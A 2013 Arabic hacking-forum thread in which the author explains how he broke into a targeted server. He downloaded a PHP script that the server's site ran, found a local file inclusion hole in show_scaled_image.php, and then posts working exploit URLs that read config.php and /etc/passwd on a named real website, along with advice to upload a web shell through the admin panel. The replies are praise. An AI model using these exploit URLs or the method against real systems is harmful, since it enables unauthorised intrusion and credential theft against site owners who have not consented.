1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

[ شرح ] استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

الموضوع في 'آمن المواقع والسيرفرات' بواسطة αЗѕαя, بتاريخ ‏25 مايو 2013.

كاتب الموضوع : αЗѕαя المشاهدات : 2,412 الردود : 15 ‏25 مايو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    αЗѕαя
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ورحمه الله وبركاته

    كيف حالكم ان شاء الله بخير وصحه وعافيه

    قبل فترة .. كنت مستهدف .. موقع على سيرفر :{6}:

    بغض النظر عن اسمه s1


    حاولنا يمين يسار .. لا فائده )A:"

    بحثت في السكربتات .. الي موجوده في مواقع السيرفر

    شفت سكربت .. مركبته أحدى المواقع

    اسمه


    Rapidleech PlugMod (eqbal) rev. Rev 43 Development Stage

    ممتاز .. نزلته .. على السيرفر المحلي

    قلنا نبحث فيه عن ثغرااات .. تفيدنا في الدخول للسيرفر &:"

    نحمل هالبرنامج .. قبل كل شئ !!:{

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    لمن لا يريد التحميل .. يبحث في قوقل !!

    phpbugscanner

    نفتح البرنامج


    [​IMG]

    وظيفة البرنامج يبحث لك عن دوال معينة .. مو شرط اذا وجدها انها ثغره

    فقد يكون الملف المصاب فيها اما ملفتر ومحمي او على مسارها هتكسس

    وبالنسبة للمربع الي على اليسار فيه دوال الي يبحث عنها البرنامج في السكربت ونستغلها في اختراق السكربت

    طبعا .. نقدر نضيف دوال من عندنا بالاضافه الى الدوال الموجوده


    [​IMG]

    بعد ما حملنا السكربت

    نفك الضغط عنه على مسار السيرفر المحلي
    bl"eh"
    كود PHP:
    C:AppServwww
    [​IMG]

    ممتاز

    ناخذ مسار .. السكربت

    ونحطه في البرنامج
    &:"

    [​IMG]

    وبعدها نضغط Scan

    [​IMG]

    كما في الصورة اعلاه

    البرنامج وظيفته اظهار جميع الدوال الموجوده فيه .. او الي التي اضفتها

    الان ندخل على السكربت من المتصفح
    &:"

    [​IMG]

    نرجع للبرنامج ونشوف الدوال الي يمكن نستثمرها

    طبعا بعد البحث و التمحص s1

    لفت نظرنا هالدالة

    [​IMG]

    نشوف الملف المصاب

    الي هو

    show_scaled_image.php

    نفتحه كما هو واضح بالبرنامج السطر رقم 24 الاصابه


    [​IMG]

    نشرح الموجود

    كود PHP:
    <?PHP
    //dirLIST v0.3.0 image scaling file
    error_reporting(0);
    $image_path '../'.rawurldecode($_GET['image_path']);

    $extension strtolower(strrchr(base****($image_path), '.'));

    switch(
    $extension)
    {
        case 
    '.jpg'header('Content-type: image/jpeg'); break;
        case 
    '.jpeg'header('Content-type: image/jpeg'); break;
        case 
    '.png'header('Content-type: image/png'); break;
        case 
    '.gif'header('Content-type: image/gif'); break;
    }

    $image_attribs getimagesize($image_path);

    $scaled_***** = 584;
    $scaled_****** = 360;

    //check if image is smaller than a required dimensions of 584 x 360...in which case just show the image
    if($image_attribs[0] <= $scaled_***** && $image_attribs[1] <= $scaled_******)
    {
        
    readfile($image_path);
    نلاحظ هنا

    الداله readfile

    كود PHP:
    readfile($image_path);
    تستدعي القيمة
    كود PHP:
    $image_path
    ولانها غير ملفتره او محمية بالمعنى الاصح

    فنقدر نستدعي اي ملف نبي

    والقيمة $image_path معرفه في اول الملف بـ نفسها

    كود PHP:
    $image_path '../'.rawurldecode($_GET['image_path']);
    ان شاء الله اوضحت الصورة &:"

    لكن حتى نقدر نرجع بالمسارات .. بالشكل المطلوب عن طريق

    ../../ الخ

    ونعرف في اي مسار حنا .. او مسار القيمة المصابه

    فلاحظنا .. انها مسبوقه بــ /.. .. كما هو واضح هنا
    كود PHP:
    $image_path '../'.rawurldecode($_GET['image_path']);
    يعني راح يكون مساري في القيمة المصابه في مجلد dirLIST_files

    وليس مجلد الملف الصاب gallery_files

    اي خلف المجلد المصاب

    رابط الاستغلال النهائي بيكون كذا

    كود PHP:
    http://127.0.0.1/ir/Dverleech-Mod-v2.1.2-22-Mar-2012/dverleech/dirLIST_files/gallery_files/show_scaled_image.php?image_path=localfile
    طبعا مثل ما ذكرت اعلاه .. مجلد ir والي بعدها. واضعها من عندي

    يعني لو كان التطبيق على موقع بيكون مثل الشكل هذا

    كود PHP:
    http://127.0.0.1/path/dirLIST_files/gallery_files/show_scaled_image.php?image_path=localfile
    طيب وش الي موجود ايضا في مسار المجلد هذا dirLIST_files

    [​IMG]

    ملف الكونفيج config.php ممتاز نحاول نقراه

    و نشوف اذا الملف مصاب فعلا ولا لأ

    فيكون ناتج الاستغلال لقراء ملف الكونفيج مثل كذا

    كود PHP:
    http://127.0.0.1/ir/Dverleech-Mod-v2.1.2-22-Mar-2012/dverleech/dirLIST_files/gallery_files/show_scaled_image.php?image_path=config.php
    نضعه في المتصفح

    [​IMG]

    اطلعت صفحه بيضاء .. لكن صبر .. هذا الي يحصل مع استعمالنا لداله readfile بدون echo

    لكن مو معناتها انه ما قراء لنا الملف

    نسوي استعراض للسورس
    #:"


    [​IMG]

    على طول نروح للوحة التحكم الموقع المراد

    ويكون مسارها كالتالي

    كود PHP:
    http://127.0.0.1/path/dirLIST_files/admin_login.php
    ونضع البيانات ونرفع الشيل

    او اننا .. نرفع شيل عن طريق اي مركز رفع في السكربت بصيغه jpg

    وسنتعرضه عن طريق الثغره اعلاها .. كما وضحت لكم الطريقة في درس سابق

    او اننا نقرا اليوزرات

    الخ الخ الخ

    و الثغره للامانه لم ابحث هي مكتشفها من قبل ام لأ

    لكن على بحثي السريع لم اجد لها ثغره

    ولله الحمد و المنه قدرت اوصل للسيرفر الي ابيه عن طريقها .. مع بعض الاضافات

    و السكربت .. قد يكون مصاب بغيرها

    واغلب مسارات المجلدات فيه محمية بهتكسس .. يعطيك فوربيدن حتى لو حاولت تستعرض الملف

    الغرض من الموضوع

    تجربة عدة طرق واساليب وبحث واختبار تطبيقات للوصول لهدفك

    استغرق مني البحث و الوصول لهذه الثغره عدة ساعات .. بحكم اني افحص يدوي + الوقوف عند كل دالة .. والبحث بعض الاحيان في قوقل .. عند بعض الدوال الجديده علي

    وهذه موقع لتجربة الثغره عليها

    كود PHP:
    http://www.downloadbooks.ir/dirLIST_files/gallery_files/show_scaled_image.php?image_path=config.php
    http://www.downloadbooks.ir/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../etc/passwd
    واعذروني اذا بعض المصطلحات البرمجية .. فيها خطأ فكنت احاول ايصال المعلومه قدر الامكان &:"

    اتمنى ان الموضوع افادكم ولو بشئ قليل


    )5:"

    [​IMG]
     


    2 شخص معجب بهذا.
    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    яσ¢к нα¢кєя
    rankrank
    Developer

    عضو منذ:
    ‏24 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    لاهنت يالغلا وبيض الله وجهك ~ )5:"
    (( جعل والديك الجنه يارب )) قول امين ~ &:" ​
     


  4. غير متصل

    •● ṔriNḉẻ ●•
    DeveloPer Plus

    عضو منذ:
    ‏5 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    وُعليكم السلآم ورحمة الله وبركاتة
    وآصل يابطل + تستاهل أحلى تقييم ..
     


  5. غير متصل

    Я Ỉ ЙČЗ ק
    rank
    Developer

    عضو منذ:
    ‏23 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    شرح وافي وكافى من شخص مبدع
    ولك خالص تحياتي :{1}:​
     


  6. غير متصل

    ĸʜɜʟɛɒ
    Active DeveloPer

    عضو منذ:
    ‏3 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    الله يعطيك الف عافيه يارب
    مودتي للك يالغالي :{1}:
     


  7. غير متصل

    мαĢ!c нαк
    rank
    Developer

    عضو منذ:
    ‏15 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    الله يرحم والديك عن النار ويحفظلك احبابك
    مشكور اخوي
    %:"​
     


  8. غير متصل

    MaDe IN K.s.A <div class="smallfont"><script src="http://www.iq-
    ExpErt DeveloPer

    عضو منذ:
    ‏16 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    بارك الله فيك
    وجعله في ميزان حسناتك
    تحياتي*:"​
     


  9. غير متصل

    Wo0oLf
    DeveloPer Plus

    عضو منذ:
    ‏22 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الوظيفة:
    طالب جامعي Computer science
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    مشاءالله عليك اخوي
    مشكور ماقصرت وجزاك الله خير
     


  10. غير متصل

    вαиɒєя
    DeveloPer Plus

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    طآلب
    الإقامة:

    رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

    الله يعطيك الف عافية
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...